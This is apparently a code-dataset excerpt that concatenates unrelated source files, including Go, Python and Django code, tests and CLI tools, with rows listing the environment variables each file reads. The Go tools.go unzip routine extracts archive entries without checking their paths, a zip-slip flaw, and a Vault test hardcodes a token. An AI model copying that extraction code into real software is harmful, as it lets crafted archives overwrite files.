Description: "An OAuth2 token used for GCP authentication",
},
"encryption_key": {
Type: schema.TypeString,
Optional: true,
Description: "A 32 byte base64 encoded 'customer supplied encryption key' used to encrypt all state.",
Default: "",
},
"project": {
Type: schema.TypeString,
Optional: true,
Description: "Google Cloud Project ID",
Default: "",
Removed: "Please remove this attribute. It is not used since the backend no longer creates the bucket if it does not yet exist.",
},
"region": {
Type: schema.TypeString,
Optional: true,
Description: "Region / location in which to create the bucket",
Default: "",
Removed: "Please remove this attribute. It is not used since the backend no longer creates the bucket if it does not yet exist.",
},
},
}
return b
}
func (b *Backend) configure(ctx context.Context) error {
if b.storageClient != nil {
return nil
}
// ctx is a background context with the backend config added.
// Since no context is passed to remoteClient.Get(), .Lock(), etc. but
// one is required for calling the GCP API, we're holding on to this
// context here and re-use it later.
b.storageContext = ctx
data := schema.FromContextBackendConfig(b.storageContext)
b.bucketName = data.Get("bucket").(string)
b.prefix = strings.TrimLeft(data.Get("prefix").(string), "/")
if b.prefix != "" && !strings.HasSuffix(b.prefix, "/") {
b.prefix = b.prefix + "/"
}
b.defaultStateFile = strings.TrimLeft(data.Get("path").(string), "/")
var opts []option.ClientOption
// Add credential source
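// Precedence, as implemented below: the "access_token" attribute, then the "credentials"
// attribute, then $GOOGLE_BACKEND_CREDENTIALS, then $GOOGLE_CREDENTIALS; if none are set,
// the client falls back to default application credentials with the storage read/write scope.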
var creds string
var tokenSource oauth2.TokenSource
if v, ok := data.GetOk("access_token"); ok {
tokenSource = oauth2.StaticTokenSource(&oauth2.Token{
AccessToken: v.(string),
})
} else if v, ok := data.GetOk("credentials"); ok {
creds = v.(string)
} else if v := os.Getenv("GOOGLE_BACKEND_CREDENTIALS"); v != "" {
creds = v
} else {
creds = os.Getenv("GOOGLE_CREDENTIALS")
}
if tokenSource != nil {
opts = append(opts, option.WithTokenSource(tokenSource))
} else if creds != "" {
var account accountFile
// to mirror how the provider works, we accept the file path or the contents
contents, err := backend.ReadPathOrContents(creds)
if err != nil {
return fmt.Errorf("Error loading credentials: %s", err)
}
if err := json.Unmarshal([]byte(contents), &account); err != nil {
return fmt.Errorf("Error parsing credentials '%s': %s", contents, err)
}
conf := jwt.Config{
Email: account.ClientEmail,
PrivateKey: []byte(account.PrivateKey),
Scopes: []string{storage.ScopeReadWrite},
TokenURL: "https://oauth2.googleapis.com/token",
}
opts = append(opts, option.WithHTTPClient(conf.Client(ctx)))
} else {
opts = append(opts, option.WithScopes(storage.ScopeReadWrite))
}
opts = append(opts, option.WithUserAgent(httpclient.UserAgentString()))
client, err := storage.NewClient(b.storageContext, opts...)
if err != nil {
return fmt.Errorf("storage.NewClient() failed: %v", err)
}
b.storageClient = client
key := data.Get("encryption_key").(string)
if key == "" {
key = os.Getenv("GOOGLE_ENCRYPTION_KEY")
}
if key != "" {
kc, err := backend.ReadPathOrContents(key)
if err != nil {
return fmt.Errorf("Error loading encryption key: %s", err)
}
// The GCS client expects a customer supplied encryption key to be
// passed in as a 32 byte long byte slice. The byte slice is base64
// encoded before being passed to the API. We take a base64 encoded key
// to remain consistent with the GCS docs.
// https://cloud.google.com/storage/docs/encryption#customer-supplied
// https://github.com/GoogleCloudPlatform/google-cloud-go/blob/def681/storage/storage.go#L1181
k, err := base64.StdEncoding.DecodeString(kc)
if err != nil {
return fmt.Errorf("Error decoding encryption key: %s", err)
}
b.encryptionKey = k
}
return nil
}
// accountFile represents the structure of the account file JSON file.
type accountFile struct {
PrivateKeyId string `json:"private_key_id"`
PrivateKey string `json:"private_key"`
ClientEmail string `json:"client_email"`
ClientId string `json:"client_id"`
}
|
[
"\"GOOGLE_BACKEND_CREDENTIALS\"",
"\"GOOGLE_CREDENTIALS\"",
"\"GOOGLE_ENCRYPTION_KEY\""
] |
[] |
[
"GOOGLE_ENCRYPTION_KEY",
"GOOGLE_CREDENTIALS",
"GOOGLE_BACKEND_CREDENTIALS"
] |
[]
|
["GOOGLE_ENCRYPTION_KEY", "GOOGLE_CREDENTIALS", "GOOGLE_BACKEND_CREDENTIALS"]
|
go
| 3 | 0 | |
tools/train_tc_defect.py
|
import argparse
import copy
import os
import os.path as osp
import time
import warnings
import sys
project_dir = '/projects/open_sources/object_detection/mmdetection'
sys.path.append(project_dir)
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import get_dist_info, init_dist
from mmcv.utils import get_git_hash
from mmdet import __version__
from mmdet.apis import set_random_seed, train_detector
from mmdet.datasets import build_dataset
from mmdet.models import build_detector
from mmdet.utils import collect_env, get_root_logger
import pdb
def parse_args():
parser = argparse.ArgumentParser(description='Train a detector')
parser.add_argument('--config',
default=os.path.join(project_dir, 'configs/fabric_defect/cascade_rcnn_r50_fpn_70e_fabric.py'),
help='train config file path')
parser.add_argument('--work-dir', default='/data/models/mmdetection/defect', help='the dir to save logs and models')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument(
'--gpus',
type=int, default=1,
help='number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='ids of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=999, help='random seed')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file (deprecated), '
'change to --cfg-options instead.')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
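# LOCAL_RANK is normally set by the distributed launcher; fall back to the --local_rank
# argument so single-process runs work as well.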
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
if args.options and args.cfg_options:
raise ValueError(
'--options and --cfg-options cannot be both '
'specified, --options is deprecated in favor of --cfg-options')
if args.options:
warnings.warn('--options is deprecated in favor of --cfg-options')
args.cfg_options = args.options
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# import modules from string list.
if cfg.get('custom_imports', None):
from mmcv.utils import import_modules_from_strings
import_modules_from_strings(**cfg['custom_imports'])
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# work_dir is determined in this priority: CLI > segment in file > filename
if args.work_dir is not None:
# update configs according to CLI args if args.work_dir is not None
cfg.work_dir = args.work_dir
elif cfg.get('work_dir', None) is None:
# use config filename as default work_dir if cfg.work_dir is None
cfg.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
if args.resume_from is not None:
cfg.resume_from = args.resume_from
if args.gpu_ids is not None:
cfg.gpu_ids = args.gpu_ids
else:
cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# re-set gpu_ids with distributed training mode
_, world_size = get_dist_info()
cfg.gpu_ids = range(world_size)
# create work_dir
mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
# dump config
cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
# init the logger before other steps
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
logger = get_root_logger(log_file=log_file, log_level=cfg.log_level)
# init the meta dict to record some important information such as
# environment info and seed, which will be logged
meta = dict()
# log env info
env_info_dict = collect_env()
env_info = '\n'.join([(f'{k}: {v}') for k, v in env_info_dict.items()])
dash_line = '-' * 60 + '\n'
logger.info('Environment info:\n' + dash_line + env_info + '\n' +
dash_line)
meta['env_info'] = env_info
meta['config'] = cfg.pretty_text
# log some basic info
logger.info(f'Distributed training: {distributed}')
logger.info(f'Config:\n{cfg.pretty_text}')
# set random seeds
if args.seed is not None:
logger.info(f'Set random seed to {args.seed}, '
f'deterministic: {args.deterministic}')
set_random_seed(args.seed, deterministic=args.deterministic)
cfg.seed = args.seed
meta['seed'] = args.seed
meta['exp_name'] = osp.basename(args.config)
# pdb.set_trace()
model = build_detector(
cfg.model,
train_cfg=cfg.get('train_cfg'),
test_cfg=cfg.get('test_cfg'))
# pdb.set_trace()
datasets = [build_dataset(cfg.data.train)]
if len(cfg.workflow) == 2:
val_dataset = copy.deepcopy(cfg.data.val)
val_dataset.pipeline = cfg.data.train.pipeline
datasets.append(build_dataset(val_dataset))
if cfg.checkpoint_config is not None:
# save mmdet version, config file content and class names in
# checkpoints as meta data
cfg.checkpoint_config.meta = dict(
mmdet_version=__version__ + get_git_hash()[:7],
CLASSES=datasets[0].CLASSES)
# add an attribute for visualization convenience
model.CLASSES = datasets[0].CLASSES
train_detector(
model,
datasets,
cfg,
distributed=distributed,
validate=(not args.no_validate),
timestamp=timestamp,
meta=meta)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"LOCAL_RANK"
] |
[]
|
["LOCAL_RANK"]
|
python
| 1 | 0 | |
app/app/wsgi.py
|
"""
WSGI config for app project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'app.settings.base')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
providers/twitch/twitch_test.go
|
package twitch
import (
"os"
"testing"
"github.com/floatingghost/goth"
"github.com/stretchr/testify/assert"
)
func provider() *Provider {
return New(os.Getenv("TWITCH_KEY"),
os.Getenv("TWITCH_SECRET"), "/foo", "user")
}
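// These tests read the Twitch client credentials from the environment; an illustrative
// invocation would be: TWITCH_KEY=<client id> TWITCH_SECRET=<client secret> go test ./providers/twitch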
func Test_New(t *testing.T) {
t.Parallel()
a := assert.New(t)
p := provider()
a.Equal(p.ClientKey, os.Getenv("TWITCH_KEY"))
a.Equal(p.Secret, os.Getenv("TWITCH_SECRET"))
a.Equal(p.CallbackURL, "/foo")
}
func Test_ImplementsProvider(t *testing.T) {
t.Parallel()
a := assert.New(t)
a.Implements((*goth.Provider)(nil), provider())
}
func Test_BeginAuth(t *testing.T) {
t.Parallel()
a := assert.New(t)
p := provider()
session, err := p.BeginAuth("test_state")
s := session.(*Session)
a.NoError(err)
a.Contains(s.AuthURL, "id.twitch.tv/oauth2/authorize")
}
func Test_SessionFromJSON(t *testing.T) {
t.Parallel()
a := assert.New(t)
p := provider()
session, err := p.UnmarshalSession(`{"AuthURL":"https://id.twitch.tv/oauth2/authorize", "AccessToken":"1234567890"}`)
a.NoError(err)
s := session.(*Session)
a.Equal(s.AuthURL, "https://id.twitch.tv/oauth2/authorize")
a.Equal(s.AccessToken, "1234567890")
}
|
[
"\"TWITCH_KEY\"",
"\"TWITCH_SECRET\"",
"\"TWITCH_KEY\"",
"\"TWITCH_SECRET\""
] |
[] |
[
"TWITCH_SECRET",
"TWITCH_KEY"
] |
[]
|
["TWITCH_SECRET", "TWITCH_KEY"]
|
go
| 2 | 0 | |
tests/common_testing.py
|
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import os
import unittest
from pathlib import Path
from typing import Callable, Optional, Union
import numpy as np
import torch
from PIL import Image
def get_tests_dir() -> Path:
"""
Returns Path for the directory containing this file.
"""
return Path(__file__).resolve().parent
def get_pytorch3d_dir() -> Path:
"""
Returns Path for the root PyTorch3D directory.
Facebook internal systems need a special case here.
"""
if os.environ.get("INSIDE_RE_WORKER") is not None:
return Path(__file__).resolve().parent
else:
return Path(__file__).resolve().parent.parent
def load_rgb_image(filename: str, data_dir: Union[str, Path]):
filepath = data_dir / filename
with Image.open(filepath) as raw_image:
image = torch.from_numpy(np.array(raw_image) / 255.0)
image = image.to(dtype=torch.float32)
return image[..., :3]
TensorOrArray = Union[torch.Tensor, np.ndarray]
def get_random_cuda_device() -> str:
"""
Function to get a random GPU device from the
available devices. This is useful for testing
that custom cuda kernels can support inputs on
any device without having to set the device explicitly.
"""
num_devices = torch.cuda.device_count()
device_id = (
torch.randint(high=num_devices, size=(1,)).item() if num_devices > 1 else 0
)
return "cuda:%d" % device_id
class TestCaseMixin(unittest.TestCase):
def assertSeparate(self, tensor1, tensor2) -> None:
"""
Verify that tensor1 and tensor2 have their data in distinct locations.
"""
self.assertNotEqual(tensor1.storage().data_ptr(), tensor2.storage().data_ptr())
def assertNotSeparate(self, tensor1, tensor2) -> None:
"""
Verify that tensor1 and tensor2 have their data in the same locations.
"""
self.assertEqual(tensor1.storage().data_ptr(), tensor2.storage().data_ptr())
def assertAllSeparate(self, tensor_list) -> None:
"""
Verify that all tensors in tensor_list have their data in
distinct locations.
"""
ptrs = [i.storage().data_ptr() for i in tensor_list]
self.assertCountEqual(ptrs, set(ptrs))
def assertNormsClose(
self,
input: TensorOrArray,
other: TensorOrArray,
norm_fn: Callable[[TensorOrArray], TensorOrArray],
*,
rtol: float = 1e-05,
atol: float = 1e-08,
equal_nan: bool = False,
msg: Optional[str] = None,
) -> None:
"""
Verifies that two tensors or arrays have the same shape and are close
given absolute and relative tolerance; raises AssertionError otherwise.
A custom norm function is computed before comparison. If no such pre-
processing needed, pass `torch.abs` or, equivalently, call `assertClose`.
Args:
input, other: two tensors or two arrays.
norm_fn: The function evaluates
`all(norm_fn(input - other) <= atol + rtol * norm_fn(other))`.
norm_fn is a tensor -> tensor function; the output has:
* all entries non-negative,
* shape defined by the input shape only.
rtol, atol, equal_nan: as for torch.allclose.
msg: message in case the assertion is violated.
Note:
Optional arguments here are all keyword-only, to avoid confusion
with msg arguments on other assert functions.
"""
self.assertEqual(np.shape(input), np.shape(other))
diff = norm_fn(input - other)
other_ = norm_fn(other)
# We want to generalise allclose(input, output), which is essentially
# all(diff <= atol + rtol * other)
# but with a sophisticated handling non-finite values.
# We work that around by calling allclose() with the following arguments:
# allclose(diff + other_, other_). This computes what we want because
# all(|diff + other_ - other_| <= atol + rtol * |other_|) ==
# all(|norm_fn(input - other)| <= atol + rtol * |norm_fn(other)|) ==
# all(norm_fn(input - other) <= atol + rtol * norm_fn(other)).
self.assertClose(
diff + other_, other_, rtol=rtol, atol=atol, equal_nan=equal_nan
)
def assertClose(
self,
input: TensorOrArray,
other: TensorOrArray,
*,
rtol: float = 1e-05,
atol: float = 1e-08,
equal_nan: bool = False,
msg: Optional[str] = None,
) -> None:
"""
Verifies that two tensors or arrays have the same shape and are close
given absolute and relative tolerance, i.e. checks
`all(|input - other| <= atol + rtol * |other|)`;
raises AssertionError otherwise.
Args:
input, other: two tensors or two arrays.
rtol, atol, equal_nan: as for torch.allclose.
msg: message in case the assertion is violated.
Note:
Optional arguments here are all keyword-only, to avoid confusion
with msg arguments on other assert functions.
"""
self.assertEqual(np.shape(input), np.shape(other))
backend = torch if torch.is_tensor(input) else np
close = backend.allclose(
input, other, rtol=rtol, atol=atol, equal_nan=equal_nan
)
if not close and msg is None:
diff = backend.abs(input - other) + 0.0
ratio = diff / backend.abs(other)
try_relative = (diff <= atol) | (backend.isfinite(ratio) & (ratio > 0))
if try_relative.all():
if backend == np:
# Avoid a weirdness with zero dimensional arrays.
ratio = np.array(ratio)
ratio[diff <= atol] = 0
extra = f" Max relative diff {ratio.max()}"
else:
extra = ""
shape = tuple(input.shape)
max_diff = diff.max()
self.fail(f"Not close. Max diff {max_diff}.{extra} Shape {shape}.")
self.assertTrue(close, msg)
|
[] |
[] |
[
"INSIDE_RE_WORKER"
] |
[]
|
["INSIDE_RE_WORKER"]
|
python
| 1 | 0 | |
config/source/vault/vault_test.go
|
package vault
import (
"encoding/json"
"fmt"
"os"
"reflect"
"strings"
"testing"
"github.com/asim/nitro/v3/config"
"github.com/asim/nitro/v3/config/memory"
)
func TestVaultMakeMap(t *testing.T) {
tt := []struct {
name string
expected []byte
input []byte
secretName string
}{
{
name: "simple valid data 1",
secretName: "my/secret",
input: []byte(`{"data":{"bar":"bazz", "tar":"par"}, "metadata":{"version":1, "destroyed": false}}`),
expected: []byte(`{"my":{"secret":{"bar":"bazz", "tar":"par"}}}`),
},
{
name: "simple valid data 2",
secretName: "my/secret",
input: []byte(`{"bar":"bazz", "tar":"par"}`),
expected: []byte(`{"my":{"secret":{"bar":"bazz", "tar":"par"}}}`),
},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
var input map[string]interface{}
var expected map[string]interface{}
_ = json.Unmarshal(tc.input, &input)
_ = json.Unmarshal(tc.expected, &expected)
out, _ := makeMap(input, tc.secretName)
if eq := reflect.DeepEqual(out, expected); !eq {
fmt.Println(eq)
t.Fatalf("expected %v and got %v", expected, out)
}
})
}
}
func TestVault_Read(t *testing.T) {
if tr := os.Getenv("CI"); len(tr) > 0 {
t.Skip()
}
var (
address = "http://127.0.0.1"
resource = "secret/data/db/auth"
token = "s.Q4Zi0CSowXZl7sh0z96ijcT4"
)
data := []byte(`{"secret":{"data":{"db":{"auth":{"host":"128.23.33.21","password":"mypassword","port":"3306","user":"myuser"}}}}}`)
tt := []struct {
name string
addr string
resource string
token string
}{
{name: "read data basic", addr: address, resource: resource, token: token},
{name: "read data without token", addr: address, resource: resource, token: ""},
{name: "read data full address format", addr: "http://127.0.0.1:8200", resource: resource, token: token},
{name: "read data wrong resource path", addr: address, resource: "secrets/data/db/auth", token: token},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
source := NewSource(
WithAddress(tc.addr),
WithResourcePath(tc.resource),
WithToken(tc.token),
)
r, err := source.Read()
if err != nil {
if tc.token == "" {
return
} else if strings.Compare(err.Error(), "source not found: secrets/data/db/auth") == 0 {
return
}
t.Errorf("%s: not able to read the config values because: %v", tc.name, err)
return
}
if string(r.Data) != string(data) {
t.Logf("data expected: %v", string(data))
t.Logf("data got from configmap: %v", string(r.Data))
t.Errorf("data from configmap does not match.")
}
})
}
}
func TestVault_String(t *testing.T) {
source := NewSource()
if source.String() != "vault" {
t.Errorf("expecting to get %v and instead got %v", "vault", source)
}
}
func TestVaultNewSource(t *testing.T) {
if tr := os.Getenv("CI"); len(tr) > 0 {
t.Skip()
}
conf, err := memory.NewConfig(config.WithSource(
NewSource(
WithAddress("http://127.0.0.1"),
WithResourcePath("secret/data/db/auth"),
WithToken("s.Q4Zi0CSowXZl7sh0z96ijcT4"),
),
))
if err != nil {
t.Fatal(err)
}
v, err := conf.Load("secret", "data", "db", "auth", "user")
if err != nil {
t.Fatal(err)
}
user := v.String("user")
if user != "myuser" {
t.Errorf("expected %v and got %v", "myuser", user)
}
v, err = conf.Load("secret", "data", "db", "auth", "host")
if err != nil {
t.Fatal(err)
}
addr := v.String("host")
if addr != "128.23.33.21" {
t.Errorf("expected %v and got %v", "128.23.33.21", addr)
}
}
|
[
"\"CI\"",
"\"CI\""
] |
[] |
[
"CI"
] |
[]
|
["CI"]
|
go
| 1 | 0 | |
pkg/components/state/state_config.go
|
/*
Copyright 2021 The Dapr Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package state
import (
"fmt"
"os"
"strings"
"github.com/pkg/errors"
)
const (
strategyKey = "keyPrefix"
strategyNamespace = "namespace"
strategyAppid = "appid"
strategyStoreName = "name"
strategyNone = "none"
strategyDefault = strategyAppid
daprSeparator = "||"
)
var (
statesConfiguration = map[string]*StoreConfiguration{}
namespace = os.Getenv("NAMESPACE")
)
type StoreConfiguration struct {
keyPrefixStrategy string
}
func SaveStateConfiguration(storeName string, metadata map[string]string) error {
strategy := metadata[strategyKey]
strategy = strings.ToLower(strategy)
if strategy == "" {
strategy = strategyDefault
} else {
err := checkKeyIllegal(metadata[strategyKey])
if err != nil {
return err
}
}
statesConfiguration[storeName] = &StoreConfiguration{keyPrefixStrategy: strategy}
return nil
}
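// Illustrative keys produced by GetModifiedStateKey for key "order" and appID "myapp",
// derived from the switch below:
//   none      -> "order"
//   name      -> "<storeName>||order"
//   appid     -> "myapp||order"
//   namespace -> "<NAMESPACE>.myapp||order" (falls back to the appid form when NAMESPACE is empty)
//   any other configured value is used as a literal prefix -> "<value>||order"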
func GetModifiedStateKey(key, storeName, appID string) (string, error) {
if err := checkKeyIllegal(key); err != nil {
return "", err
}
stateConfiguration := getStateConfiguration(storeName)
switch stateConfiguration.keyPrefixStrategy {
case strategyNone:
return key, nil
case strategyStoreName:
return fmt.Sprintf("%s%s%s", storeName, daprSeparator, key), nil
case strategyAppid:
if appID == "" {
return key, nil
}
return fmt.Sprintf("%s%s%s", appID, daprSeparator, key), nil
case strategyNamespace:
if appID == "" {
return key, nil
}
if namespace == "" {
// if namespace is empty, fallback to app id strategy
return fmt.Sprintf("%s%s%s", appID, daprSeparator, key), nil
}
return fmt.Sprintf("%s.%s%s%s", namespace, appID, daprSeparator, key), nil
default:
return fmt.Sprintf("%s%s%s", stateConfiguration.keyPrefixStrategy, daprSeparator, key), nil
}
}
func GetOriginalStateKey(modifiedStateKey string) string {
splits := strings.Split(modifiedStateKey, daprSeparator)
if len(splits) <= 1 {
return modifiedStateKey
}
return splits[1]
}
func getStateConfiguration(storeName string) *StoreConfiguration {
c := statesConfiguration[storeName]
if c == nil {
c = &StoreConfiguration{keyPrefixStrategy: strategyDefault}
statesConfiguration[storeName] = c
}
return c
}
func checkKeyIllegal(key string) error {
if strings.Contains(key, daprSeparator) {
return errors.Errorf("input key/keyPrefix '%s' can't contain '%s'", key, daprSeparator)
}
return nil
}
|
[
"\"NAMESPACE\""
] |
[] |
[
"NAMESPACE"
] |
[]
|
["NAMESPACE"]
|
go
| 1 | 0 | |
tools.go
|
package main
import (
"archive/zip"
"bytes"
"fmt"
"github.com/spf13/viper"
"io"
"io/ioutil"
"log"
"net/http"
"os"
"path"
"path/filepath"
"strings"
)
type Config struct {
Default struct {
Name string `mapstructure:"name"`
Command string `mapstructure:"command"`
Category string `mapstructure:"category"`
Comment string `mapstructure:"comment"`
Status string `mapstructure:"status"`
}
}
func filenameWithoutExtension(fn string) string {
return strings.TrimSuffix(fn, path.Ext(fn))
}
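// getAppDirectory returns the tool directory: $DOIG_PATH when it is set
// (e.g. DOIG_PATH=/opt/doig, an illustrative value), otherwise ~/.<APP_NAME>.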
func getAppDirectory() string {
if len(os.Getenv("DOIG_PATH")) > 0 {
return os.Getenv("DOIG_PATH")
} else {
home, err := os.UserHomeDir()
if err != nil {
log.Fatal(err)
}
return home + "/." + APP_NAME
}
}
func loadTools(toolsDb map[string]*Config, directory string) {
myviper := viper.New()
myviper.AddConfigPath(directory)
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
if filepath.Ext(path) == ".ini" {
myviper.SetConfigName(filenameWithoutExtension(info.Name()))
err = myviper.ReadInConfig()
if err != nil {
log.Fatal(fmt.Errorf("Fatal error config file: %s \n", err))
}
cfg := new(Config)
err = myviper.Unmarshal(cfg)
if err != nil {
log.Fatal(fmt.Errorf("Fatal error unmarshaling config file: %s \n", err))
}
if (cfg.Default.Status != "disabled") {
toolsDb[myviper.GetString("default.name")] = cfg
}
}
return nil
})
if err != nil {
log.Fatal(Red(err))
}
}
func DownloadFile(url string) ([]byte, error) {
resp, err := http.Get(url)
if err != nil {
return nil, err
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
return nil, err
}
return body, nil
}
func Unzip(zipFile []byte, dir string) error {
r, err := zip.NewReader(bytes.NewReader(zipFile), int64(len(zipFile)))
if err != nil {
return err
}
for _, zf := range r.File {
if zf.FileInfo().IsDir() {
err := os.MkdirAll(filepath.Join(dir, zf.Name), os.ModePerm)
if err != nil {
fmt.Println(Red("[X] Error creating " + filepath.Join(dir, zf.Name)))
return err
}
continue
}
dst, err := os.Create(dir + "/" + zf.Name)
if err != nil {
fmt.Println(Red("[X] Error creating " + dir + "/" + zf.Name))
return err
}
defer dst.Close()
src, err := zf.Open()
if err != nil {
return err
}
defer src.Close()
_, err = io.Copy(dst, src)
if err != nil {
return nil
}
}
return nil
}
func UpdateTools(dir string) error {
fmt.Println(Green("[*] Updating tools ..."))
zipFile, err := DownloadFile(TOOLS_URL)
if err != nil {
fmt.Println(Red("[X] Error downloading tools ..."))
return err
}
err = Unzip(zipFile, dir)
if err != nil {
fmt.Println(Red("[X] Error unzipping tools ..."))
return err
}
return nil
}
|
[
"\"DOIG_PATH\"",
"\"DOIG_PATH\""
] |
[] |
[
"DOIG_PATH"
] |
[]
|
["DOIG_PATH"]
|
go
| 1 | 0 | |
internal/bot/bot.go
|
package bot
import (
"net/http"
"os"
"github.com/sirupsen/logrus"
"github.com/jexia/discord-bot/internal/pkg/commands"
"github.com/jexia/discord-bot/internal/pkg/discord"
"github.com/jexia/discord-bot/internal/pkg/github"
)
// Start initiates the HTTP server for webhooks and requests the bot to start
func Start() {
// Tell the world we're running
logrus.Info("Bot started")
// Starts separate process that listen for events on the queue
go github.StartWatching()
go discord.StartBot()
// Load in commands and start the subscriber
go commands.StartSubscriber()
// Add the endpoint for github webhook payloads
http.HandleFunc("/github", github.WebhookListener)
// Start the HTTP server on the address given by the "address" environment variable
address := os.Getenv("address")
logrus.Fatal(http.ListenAndServe(address, nil))
}
|
[
"\"address\""
] |
[] |
[
"address"
] |
[]
|
["address"]
|
go
| 1 | 0 | |
pkg/cmd/pr/pr.go
|
package pr
import (
"fmt"
"github.com/jenkins-x/jx-gitops/pkg/cmd/git/setup"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient"
"github.com/jenkins-x/jx-helpers/v3/pkg/helmer"
"github.com/jenkins-x/jx-helpers/v3/pkg/scmhelpers"
"github.com/jenkins-x/jx-helpers/v3/pkg/stringhelpers"
"github.com/shurcooL/githubv4"
"io/ioutil"
"os"
"path/filepath"
"strings"
"github.com/jenkins-x-plugins/jx-updatebot/pkg/apis/updatebot/v1alpha1"
"github.com/jenkins-x-plugins/jx-updatebot/pkg/rootcmd"
"github.com/jenkins-x/go-scm/scm"
"github.com/jenkins-x/jx-helpers/v3/pkg/cobras/helper"
"github.com/jenkins-x/jx-helpers/v3/pkg/cobras/templates"
"github.com/jenkins-x/jx-helpers/v3/pkg/files"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient/gitdiscovery"
"github.com/jenkins-x/jx-helpers/v3/pkg/options"
"github.com/jenkins-x/jx-helpers/v3/pkg/termcolor"
"github.com/jenkins-x/jx-helpers/v3/pkg/yamls"
"github.com/jenkins-x/jx-logging/v3/pkg/log"
"github.com/jenkins-x/jx-promote/pkg/environments"
"github.com/pkg/errors"
"github.com/spf13/cobra"
)
var (
info = termcolor.ColorInfo
cmdLong = templates.LongDesc(`
Create a Pull Request on each downstream repository
`)
cmdExample = templates.Examples(`
%s pr --test-url https://github.com/myorg/mytest.git
`)
)
// Options the options for the command
type Options struct {
environments.EnvironmentPullRequestOptions
Dir string
ConfigFile string
Version string
VersionFile string
PullRequestTitle string
PullRequestBody string
GitCommitUsername string
GitCommitUserEmail string
AutoMerge bool
NoVersion bool
GitCredentials bool
Labels []string
TemplateData map[string]interface{}
PullRequestSHAs map[string]string
Helmer helmer.Helmer
GraphQLClient *githubv4.Client
UpdateConfig v1alpha1.UpdateConfig
}
// NewCmdPullRequest creates a command object for the command
func NewCmdPullRequest() (*cobra.Command, *Options) {
o := &Options{}
cmd := &cobra.Command{
Use: "pr",
Short: "Create a Pull Request on each downstream repository",
Long: cmdLong,
Example: fmt.Sprintf(cmdExample, rootcmd.BinaryName),
Run: func(cmd *cobra.Command, args []string) {
err := o.Run()
helper.CheckErr(err)
},
}
cmd.Flags().StringVarP(&o.Dir, "dir", "d", ".", "the directory look for the VERSION file")
cmd.Flags().StringVarP(&o.ConfigFile, "config-file", "c", "", "the updatebot config file. If none specified defaults to .jx/updatebot.yaml")
cmd.Flags().StringVarP(&o.Version, "version", "", "", "the version number to promote. If not specified uses $VERSION or the version file")
cmd.Flags().StringVarP(&o.VersionFile, "version-file", "", "", "the file to load the version from if not specified directly or via a $VERSION environment variable. Defaults to VERSION in the current dir")
cmd.Flags().StringVar(&o.PullRequestTitle, "pull-request-title", "", "the PR title")
cmd.Flags().StringVar(&o.PullRequestBody, "pull-request-body", "", "the PR body")
cmd.Flags().StringVarP(&o.GitCommitUsername, "git-user-name", "", "", "the user name to git commit")
cmd.Flags().StringVarP(&o.GitCommitUserEmail, "git-user-email", "", "", "the user email to git commit")
cmd.Flags().StringSliceVar(&o.Labels, "labels", []string{}, "a list of labels to apply to the PR")
cmd.Flags().BoolVarP(&o.AutoMerge, "auto-merge", "", true, "should we automatically merge if the PR pipeline is green")
cmd.Flags().BoolVarP(&o.NoVersion, "no-version", "", false, "disables validation on requiring a '--version' option or environment variable to be required")
cmd.Flags().BoolVarP(&o.GitCredentials, "git-credentials", "", false, "ensures the git credentials are setup so we can push to git")
o.EnvironmentPullRequestOptions.ScmClientFactory.AddFlags(cmd)
eo := &o.EnvironmentPullRequestOptions
